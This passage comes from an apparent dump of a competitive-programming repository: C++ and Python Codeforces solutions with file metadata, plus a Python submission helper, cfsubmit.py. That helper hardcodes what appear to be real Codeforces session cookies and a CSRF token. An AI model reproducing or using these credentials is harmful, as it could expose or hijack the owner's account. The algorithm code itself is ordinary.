temp;\n}\n\nint updateC(string &s, int i, int temp, int inb, bool b)\n{\n int c1 = 0;\n if (s[i - 1] >= '0' && s[i - 1] <= '9')\n c1 = temp * (b ? inb : 1);\n return c1;\n}\n\nvoid parse(string s, int &x1, int &y1, int &c1)\n{\n int temp = 1, inb = 1, sig = 1;\n bool b = false;\n for (int i = 0; i < s.size(); ++i)\n switch (s[i])\n {\n case '(' :\n b = true;\n inb = 1;\n break;\n case '=' :\n sig = -1;\n case ')' :\n c1 += updateC(s, i, temp, inb, b);\n b = false;\n temp = sig;\n inb = 1;\n break;\n\n case 'x' :\n x1 += temp * (b ? inb : 1);\n inb = 1;\n break;\n\n case 'y' :\n y1 += temp * (b ? 
inb : 1);\n inb = 1;\n break;\n\n case '-' :\n c1 += updateC(s, i, temp, inb, b);\n if (b)\n inb = -1;\n else\n temp = sig * -1;\n// (b ? inb : temp) = -1;\n break;\n\n case '+' :\n c1 += updateC(s, i, temp, inb, b);\n inb = 1;\n if (!b)\n temp = sig;\n break;\n\n default :\n (b ? inb : temp) *= atoi(s, i);\n }\n}\n\nvoid run()\n{\n readln(s, t);\n s += ')';\n t += ')';\n int aa, bb, cc, dd, ee, ff;\n aa = bb = cc = dd = ee = ff = 0;\n parse(s, aa, bb, cc);\n parse(t, dd, ee, ff);\n// writeln(a, \"x +\", b, \"y =\", -c);\n// riteln(d, \"x +\", e, \"y =\", -f);\n double x, y;\n double a, b, c, d, e, f;\n a = aa;\n b = bb;\n c = cc;\n d = dd;\n e = ee;\n f = ff;\n y = f * a - c * d;\n y /= b * d - e * a;\n x = b * f - c * e;\n x /= a * e - b * d;\n cout << fixed;\n cout << setprecision(9) << x << \"\\n\";\n cout << setprecision(9) << y << \"\\n\";\n}\n\nint main()\n{\n freopen(\"input.txt\", \"r\", stdin);\n freopen(\"output.txt\", \"w\", stdout);\n run();\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nvoid print(double a){printf(\" \" DOUBLEFORMAT,a);}\nvoid print(int a){printf(\" %d\",a);}\nvoid print(string a){printf(\" %s\",a.c_str());}\nvoid print(long long a){printf(\" %lld\",a);}\nvoid print(unsigned long a){printf(\" %ld\",a);}\nvoid print(unsigned int a){printf(\" %d\",a);}\nvoid print(char a){printf(\" %c\",a);}\nvoid print_no_space(double a){printf(DOUBLEFORMAT, a);}\nvoid print_no_space(int a){printf(\"%d\", a);}\nvoid print_no_space(string a){printf(\"%s\", a.c_str());}\nvoid print_no_space(long long a){printf(\"%lld\", a);}\nvoid print_no_space(unsigned long a){printf(\"%ld\", a);}\nvoid print_no_space(unsigned int a){printf(\"%d\", a);}\nvoid print_no_space(char a){printf(\"%c\", a);}\n\ntemplate<class Type>\nvoid print_no_space(vector<Type>& a);\ntemplate<class Type>\nvoid print(vector<Type>& a){for(int i=0;i<a.size();++i)print(a[i]);}\ntemplate<class Type>\nvoid print(vector<vector<Type> >& 
a){if(a.size())(a.size()==1)?print(a[0]):writeln2(a[0]);for(int i=1;i<a.size()-1;++i)writeln2(a[i]);if(a.size()>=2)print_no_space(a.back());}\ntemplate<class Type1, class Type2>\nvoid print(pair<Type1, Type2>& a){print(a.first);print(a.second);}\n\ntemplate<class Type>\nvoid print_no_space(vector<Type>& a){if(a.size())print_no_space(a[0]);for(int i=1;i<a.size();++i)print(a[i]);}\ntemplate<class Type>\nvoid print_no_space(vector<vector<Type> >&a){for(int i=0;i<a.size()-1;++i)writeln(a[i]);if(a.size())print_no_space(a.back());}\ntemplate<class Type1, class Type2>\nvoid print_no_space(pair<Type1, Type2>&a){print_no_space(a.first);print(a.second);}\ntemplate <class Head, class... Tail>\nvoid writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntemplate <class Head, class... Tail>\nvoid writeln(Head head, Tail... tail){print_no_space(head);writeln2(tail...);}\n\nvoid read(double &a){scanf(\"%lf\",&a);}\nvoid read(int &a){scanf(\"%d\",&a);}\nvoid read(string &a){cin>>a;}\nvoid read(long long &a){scanf(\"%lld\",&a);}\nvoid read(char &a){scanf(\"%c\",&a);}\ntemplate<class Type1, class Type2>\nvoid read(pair<Type1, Type2>&a){readln(a.first, a.second);}\ntemplate<class Type>\nvoid read(vector<Type> &a){if(a.size()==0){int n;read(n);a.resize(n);}for(int i=0;i<a.size();++i)readln(a[i]);}\ntemplate <class Head,class... Tail>\nvoid readln(Head& head,Tail&... tail){read(head);readln(tail...);}\n" }, { "alpha_fraction": 0.4878803491592407, "alphanum_fraction": 0.5092831254005432, "avg_line_length": 31.86440658569336, "blob_id": "7cc7fe1c03e53b2c7684b950e399490d14bf50b8", "content_id": "0a4cd42af24bd1fd1b165dfddc40e29698814eb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3878, "license_type": "no_license", "max_line_length": 174, "num_lines": 118, "path": "/CodeForce/1326/D2.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nauto manaker(const string& s)\n{\n int n = SZ(s);\n vector<vector<int>> p(2,vector<int>(n,0));\n for(int z=0,l=0,r=0;z<2;z++,l=0,r=0)\n for(int i=0;i<n;i++)\n {\n if(i<r) p[z][i]=min(r-i+!z,p[z][l+r-i+!z]);\n int L=i-p[z][i], R=i+p[z][i]-!z;\n while(L-1>=0 && R+1<n && s[L-1]==s[R+1]) p[z][i]++,L--,R++;\n if(R>r) l=L,r=R;\n }\n return p;\n}\n\nvoid run()\n{\n string s;\n readln(s);\n auto get = [](const string& s) -> string {\n int n = SZ(s);\n auto p = manaker(s);\n vector<set<int>> forward(n);\n int l = 0;\n int r = n;\n int mx = 0;\n fori(n)\n {\n if (int len = p[0][i]; len)\n forward[i - len].insert(-i - len + 1);\n if (int len = p[1][i]; len)\n forward[i - len].insert(-i - len);\n }\n int i = -1;\n int j = n;\n do\n {\n int ci = i;\n auto it = forward[i + 1].upper_bound(-j);\n if (it != forward[i + 1].end())\n ci = -*it;\n else if (ci + 1 < j)\n ci++;\n //writeln(i, j, s.substr(0, ci + 1) + s.substr(j));\n if (int cur = ci + (n - j); cur > mx)\n mx = cur,\n l = ci,\n r = j;\n ++i;\n --j;\n }\n while (i < j && s[i] == s[j]);\n return s.substr(0, l + 1) + s.substr(r);\n };\n string first = get(s);\n reverse(all(s));\n string second = get(s);\n if (SZ(first) >= SZ(second))\n writeln(first);\n else\n writeln(second);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t); fori(t) run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename 
T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5206394791603088, "alphanum_fraction": 0.5602481365203857, "avg_line_length": 31.230770111083984, "blob_id": "365732a74121d0ba52fff1c6c830149cee89e213", "content_id": "9b35ee4086cfaf7144ef014359c3b0eb5582fd46", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4191, "license_type": "no_license", "max_line_length": 148, "num_lines": 130, "path": "/staff/cfsubmit.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n\nimport os\nimport requests\nimport sys\nimport itertools\nimport time\nfrom time import sleep\n\n# Edit these four variables according to your needs:\nx_user = '''\nd00ef4d59145a678537c71c8a14b63cd4e4d86f10e4a6b1c1bb926d6159a696bfae78d577e719e40\n'''[1:-1]\ncsrf_token = '''\n936df2b684e1514a5a82a0c0bfdbfa77\n'''[1:-1]\ncf_domain = 'com'\nusername = 'igorajn'\nuser_agent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36'\nweird_name = '39ce7'\nweird_val = 'CFdhiqLe'\njsession = 'CEB1FBBB3256E0B89739343AC12C26D1-n1'\n\n#{{{\nupdateInterval = 2 #in seconds\ncountOfSubmits = 3 #count of previous submits, shown after done submission. 
If count == 1, nothing happens.\next_id = {\n \"cpp\": \"42\",\n \"hs\": \"12\",\n \"java\": \"36\",\n \"py\": \"41\",\n}\n#}}}\n\n#{{{\ndef getSubmissions():\n while True:\n try:\n data = requests.get(\"http://codeforces.ru/api/user.status?handle=\" + username + \"&from=1&count=\" + str(countOfSubmits)).json()['result']\n except:\n sleep(updateInterval)\n continue\n if countOfSubmits > 1:\n print(\"last submits\")\n for s in reversed(data[1:]):\n try:\n print(str(s['problem']['contestId']) + s['problem']['index'] + \" \" + \\\n '{:>20}'.format(s['verdict'] + \"(\" + str(s['passedTestCount'] + 1) + \") \") + str(s['timeConsumedMillis']) + \" ms\")\n except:\n print()\n sys.stdout.flush()\n s = data[0]\n try:\n print(str(s['problem']['contestId']) + s['problem']['index'] + \" \" + \\\n '{:>20}'.format(s['verdict'] + \"(\" + str(s['passedTestCount'] + 1) + \") \") + str(s['timeConsumedMillis']) + \" ms\")\n if s['verdict'] != 'TESTING':\n break\n except:\n print()\n sleep(updateInterval)\n#}}}\n\n#{{{\n#if len(sys.argv) > 2:\n #countOfSubmits = int(sys.argv[2])\n #getSubmissions()\n #sys.exit()\n\n#if len(sys.argv) < 2:\n #print(\"Solution filename not specified\")\n #sys.exit()\n\n#if not os.path.exists(sys.argv[1]):\n #print(\"Solution file does not exist or not enough rights to read it\")\n #sys.exit()\n\n#filename = os.path.basename(sys.argv[1])\n\n#contest_id = ''.join(itertools.takewhile(lambda c: c.isdigit(), filename))\n#problem_index = ''.join(itertools.takewhile(lambda c: c != '.', filename[len(contest_id):])).upper()\n#extension = filename[len(contest_id) + len(problem_index) + 1:].lower()\n\n#if (len(contest_id) == 0) or (len(problem_index) == 0):\n #contest_id = os.path.dirname(os.path.realpath(sys.argv[1])).split(os.sep)[-1]\n #temp = filename.split('.')\n #problem_index = temp[0].upper()\n #extension = temp[-1].lower()\n #if (not contest_id.isdigit() or (len(problem_index) > 2)):\n #print(\"Incorrect filename format. 
Example: 123A.cpp or 123/A.cpp\")\n #sys.exit()\n\n#if not extension in ext_id:\n #print(\"Unknown extension. Please check 'ext_id' variable\")\n #sys.exit()\n\n#}}}\n\n#parts = {\n #\"csrf_token\": csrf_token,\n #\"action\": \"submitSolutionFormSubmitted\",\n #\"submittedProblemIndex\": problem_index,\n #\"source\": open(sys.argv[1], \"rb\"),\n #\"programTypeId\": ext_id[extension],\n #\"sourceFile\": \"\",\n #\"_tta\": \"222\"\n#}\n\nurl = \"http://codeforces.com/api/contest.status?contestId=522&from=1&count=3\"\n#url = \"http://codeforces.\" + cf_domain + \"/contest/\" + contest_id + \"/problem/\" + problem_index,\n#print(\"you' ve submitted \" + contest_id + problem_index + extension)\nr = requests.post(url,\n params = {\n \"csrf_token\" : csrf_token\n },\n# files = parts,\n headers = {\n \"User-Agent\" : user_agent,\n },\n cookies = {\n \"X-User\": x_user,\n \"JSESSIONID\": jsession,\n weird_name: weird_val,\n \"70a7c28f3de\" : \"d5gpvi9c2ugfd2t9yg\"\n }\n)\nprint(r.text)\nif r.status_code == requests.codes.ok:\n print(\"Solution is successfully sent. 
Current time is \" + time.strftime(\"%H:%M:%S\"))\n\ngetSubmissions()\n\n" }, { "alpha_fraction": 0.47398844361305237, "alphanum_fraction": 0.49132949113845825, "avg_line_length": 18.22222137451172, "blob_id": "e351ab8b0fd6b520ff52c21fc3fae47a75ff0a1c", "content_id": "32c6ce287c3b6d64777765c0d9a12b3745ef9c49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 173, "license_type": "no_license", "max_line_length": 37, "num_lines": 9, "path": "/CodeForce/0522/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\nm = {'polycarp' : 0}\nfor i in range(n):\n s, r, t = input().lower().split()\n m[s] = m[t] + 1\nmx = 0\nfor y in m.values():\n mx = max(mx, y)\nprint(mx)\n" }, { "alpha_fraction": 0.4916055500507355, "alphanum_fraction": 0.5246943831443787, "avg_line_length": 29.073530197143555, "blob_id": "bded58c77d322ab89a21d63f3eb0402b577bf03a", "content_id": "5422fe148b55f124f72479af0fbfa58ce2199705", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6135, "license_type": "no_license", "max_line_length": 167, "num_lines": 204, "path": "/CodeForce/0807/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (#define -> typedef, readln(vector) patched, version from 27 March 2017)\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\ntypedef vector<long long> vll;\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n#define pb 
push_back\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n\n#define ints(a...) int a; readln(a)\n#define lls(a...) ll a; readln(a)\n#define wr(args...) err(split(#args,',').begin(),args)\n \n#define FILENAME \"input\"\n#define INF 1000000007\n \n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return v;}\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n//Igorjan\nvector<int> prices = {500, 1000, 1500, 2000, 2500, 3000};\nvector<int> pricesrev = {3000, 2500, 2000, 1500, 1000, 500};\nmap<int, int> qs;\nvector<int> q(5, 0);\nint n;\n\nint getScores(vector<vector<int>>& people, int fakes, vector<int> prices)\n{\n bool ok = true;\n forj(5)\n {\n int z = qs[prices[j]];\n int a = n + fakes;\n int ac = (a - z * q[j]) / z;\n auto check = [&](int ac) {\n return ac >= 0 && ac <= fakes && z * (q[j] + ac) <= a && (z == 32 || a < 2 * z * (q[j] 
+ ac));\n };\n if (people[0][j] == -1) ok &= check(0);\n else ok &= check(ac) || check(fakes);\n }\n\n return ok;\n}\n\nint result(vector<int>& x, vector<int> prices)\n{\n int ans = 0;\n fori(x.size())\n if (x[i] != -1)\n ans += (prices[i] / 250) * (250 - x[i]);\n return ans;\n}\n\nvector<vector<int>> checks;\nvoid run()\n{\n qs[500] = 1;\n qs[1000] = 2;\n qs[1500] = 4;\n qs[2000] = 8;\n qs[2500] = 16;\n qs[3000] = 32;\n readln(n);\n vector<vector<int>> people(n, vector<int>(5));\n readln(people);\n fori(n)\n forj(5)\n if (people[i][j] != -1)\n q[j]++;\n\n //-1 check\n\n vector<int> ppp;\n\tvector<vector<int>> ccc;\n forj(5)\n if ((people[0][j] != -1 && people[0][j] <= people[1][j]) || people[1][j] == -1)\n ppp.pb(3000),\n\t\t\tccc.pb(prices);\n else\n ppp.pb(500),\n\t\t\tccc.pb(pricesrev);\n int v = result(people[0], ppp);\n int p = result(people[1], ppp);\n //writeln(v, p, ppp);\n //cout.flush();\n if (v <= p)\n {\n writeln(-1);\n return;\n }\n\n //int a = 1000, b = 1000, c = 500, d = 500, e = 500;\n double time = clock();\n for (int a = 0; a < prices.size(); ++a)\n for (int b = 0; b < prices.size(); ++b)\n for (int c = 0; c < prices.size(); ++c)\n for (int d = 0; d < prices.size(); ++d)\n for (int e = 0; e < prices.size(); ++e)\n if (result(people[0], {prices[a], prices[b], prices[c], prices[d], prices[e]}) >\n result(people[1], {prices[a], prices[b], prices[c], prices[d], prices[e]}))\n checks.pb({prices[a], prices[b], prices[c], prices[d], prices[e]});\n forn(fakes, 4000)\n {\n for (auto& check: checks)\n {\n int can = getScores(people, fakes, check);\n if (can)\n {\n writeln(fakes);\n return;\n }\n //if ((clock() - time) / CLOCKS_PER_SEC > 1.9)\n //{\n //writeln(-1);\n //return;\n //}\n }\n }\n writeln(-1);\n}\n\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution 
time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti ostream&operator<<(ostream&os,valarray<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,valarray<T>&a){for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.5095295310020447, "alphanum_fraction": 0.5226778984069824, "avg_line_length": 35.043479919433594, "blob_id": "2fd99e7135e6642bcd1caeb10ccffe874c36a612", "content_id": "e4755881d51cc5ab0bce92472c08bcbc76817bab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 8290, "license_type": "no_license", "max_line_length": 174, "num_lines": 230, "path": "/CodeForce/1359/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\nstatic const long double EPS = 1e-15;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//printTuple\ntemplate<class Tuple, size_t... Is> ostream& print_tuple(ostream& os, const Tuple& t, index_sequence<Is...>) { ((os << (Is == 0 ? \"\" : \" \") << get<Is>(t)), ...); return os; }\ntemplate<class Tuple, size_t... Is> istream& read_tuple(istream& is, Tuple& t, index_sequence<Is...>) { ((is >> get<Is>(t)), ...); return is; }\ntemplate<class... Args> inline ostream& operator<<(ostream& os, const tuple<Args...>& t) { return print_tuple(os, t, index_sequence_for<Args...>{}); }\ntemplate<class... 
Args> inline istream& operator>>(istream& is, tuple<Args...>& t) { return read_tuple(is, t, index_sequence_for<Args...>{}); }\n\n//binSearch\n//x \\in [l, r]-> min, f(x) == true\ntemplate<typename T, typename F>\nT binSearch(T l, T r, F f)\n{\n T m;\n fori(60)\n m = l + (r - l) / 2,\n (f(m) ? r : l) = m;\n return f(l) ? l : r;\n}\n\n//point\n#define pointtt template<typename T = int>\n//sorts only if z is corner point;\n#define sortByPolarAngle(v, z, T) sort(v.begin(), v.end(), [&z](point<T>& a, point<T>& b) {\\\n int q = orientation(z, a, b); return q == 0 ? dist(z, a) < dist(z, b) : q == -1;\\\n});\n\npointtt struct point\n{\n T x, y;\n point(){}\n point(T _x, T _y) : x(_x), y(_y) {}\n point operator=(const point& b) { x = b.x; y = b.y; return *this; }\n point operator+(const point& b) const { return point(x + b.x, y + b.y); }\n point operator-(const point& b) const { return point(x - b.x, y - b.y); }\n point operator-() const { return point(-x, -y); }\n point operator*(T b) { return point(x * b, y * b); }\n T operator*(const point& b) const { return x * b.x + y * b.y; }\n T operator^(const point& b) const { return x * b.y - y * b.x; }\n T operator!() const { return x * x + y * y; }\n bool operator<(const point& b) const { return x == b.x ? 
y < b.y : x < b.x; }\n};\npointtt istream&operator>>(istream&is,point<T>&a){return is>>a.x>>a.y;}\npointtt ostream&operator<<(ostream&os,point<T>&a){return os<<a.x<<\" \"<<a.y;}\npointtt T dist(const point<T>&a,const point<T>&b){return!point<T>(a-b);}\n//dist from point C to line AB equals to answer.first / sqrt(answer.second);\npointtt pair<T,T> dist(const point<T>&a,const point<T>&b,const point<T>&c){return{abs((a-b)*c)+(a^b),dist(a,b)};}\nstatic const int CW = 1;\nstatic const int CCW = -1;\npointtt int orientation(const point<T>&a,const point<T>&b,const point<T>&c){T q=(b.x - a.x) * (c.y - a.y) - (b.y - a.y) * (c.x - a.x);return q>EPS?CCW:q<-EPS?CW:0;}\n//reflects point C to line AB (in doubles)\npointtt point<T> reflect(const point<T>&a,const point<T>&b,const point<T>&c){\n T A = a.y - b.y;\n T B = b.x - a.x;\n T C = a ^ b;\n T D = A * A - B * B;\n T S = A * A + B * B;\n return {(-D * c.x - 2 * A * B * c.y - 2 * A * C) / S, (D * c.y - 2 * A * B * c.x - 2 * B * C) / S};\n};\n\n//}}}\n\ntemplate<typename T>\nstruct segment\n{\n point<T> p, q;\n int i;\n\n\tT get_y(T x) const {\n\t\tif (abs(p.x - q.x) < EPS) return p.y;\n\t\treturn p.y + (q.y - p.y) * (x - p.x) / (q.x - p.x);\n\t}\n\n bool operator<(const segment& b) const\n {\n T x = max (min(p.x, q.x), min(b.p.x, b.q.x));\n return get_y(x) < b.get_y(x) - EPS;\n };\n\n friend ostream& operator<<(ostream& os, const segment& s) {\n return os << s.p.x << \" \" << s.p.y << \" \" << s.q.x << \" \" << s.q.y << \" \" << s.i;\n };\n};\n\ntemplate<typename T>\nstruct event {\n T x;\n int type;\n int i;\n\n bool operator<(const event& b) const {\n if (abs(x - b.x) > EPS)\n return x < b.x;\n return type < b.type;\n };\n};\n\ntypedef long double T;\ntypedef point<T> p;\n\ninline bool intersect1d(T l1, T r1, T l2, T r2) {\n\tif (l1 > r1) swap(l1, r1);\n\tif (l2 > r2) swap(l2, r2);\n\treturn max(l1, l2) <= min(r1, r2) + EPS;\n}\n\nvoid run()\n{\n ints(n);\n vector<tuple<p, p, int>> cars(n);\n readln(cars);\n cout << fixed << 
setprecision(15);\n const T mx = 1e10;\n //const T mx = 100;\n T m = binSearch(T(0), mx, [&](T t) {\n vector<event<T>> events;\n vector<segment<T>> segments(n);\n fori(n)\n {\n auto [f, d, speed] = cars[i];\n auto s = f + d * (speed * t / sqrt(!d));\n events.pb({min(f.x, s.x), -1, i});\n events.pb({max(f.x, s.x), 1, i});\n segments[i] = {f, s, i};\n }\n sort(all(events));\n set<segment<T>> s;\n using it = decltype(s.begin());\n vector<it> iterators(n);\n\n auto prev = [&](auto it) {\n return it == s.begin() ? s.end() : --it;\n };\n auto next = [&](auto it) {\n return ++it;\n };\n auto vec = [&](const p& a, const p& b, const p& c) {\n double s = (b.x - a.x) * (c.y - a.y) - (b.y - a.y) * (c.x - a.x);\n return abs(s) < EPS ? 0 : s > 0 ? +1 : -1;\n };\n auto intersects = [&](it A, const segment<T>& b) {\n if (A == s.end())\n return false;\n auto a = *A;\n\n bool ok = intersect1d(a.p.x, a.q.x, b.p.x, b.q.x)\n && intersect1d(a.p.y, a.q.y, b.p.y, b.q.y)\n && orientation(a.p, a.q, b.p) * orientation(a.p, a.q, b.q) <= 0\n && orientation(b.p, b.q, a.p) * orientation(b.p, b.q, a.q) <= 0;\n return ok;\n };\n for (auto [x, t, id]: events)\n if (t == -1) // begin\n {\n auto nxt = s.lower_bound(segments[id]);\n auto prv = prev(nxt);\n if (intersects(nxt, segments[id]))\n return true;\n if (intersects(prv, segments[id]))\n return true;\n iterators[id] = s.insert(nxt, segments[id]);\n }\n else\n {\n auto nxt = next(iterators[id]);\n auto prv = prev(iterators[id]);\n if (nxt != s.end() && intersects(prv, *nxt))\n return true;\n s.erase(iterators[id]);\n }\n return false;\n });\n if (m == mx)\n writeln(\"No show :(\");\n else\n writeln(m);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename 
D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4746945798397064, "alphanum_fraction": 0.498036652803421, "avg_line_length": 28.384614944458008, "blob_id": "826aa130d302bc14eebc22c2ced31bb66ca43ff0", "content_id": "37609ab4136cdf0cc909c83bc18b15224224053a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4584, "license_type": "no_license", "max_line_length": 174, "num_lines": 156, "path": "/CodeForce/1326/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include 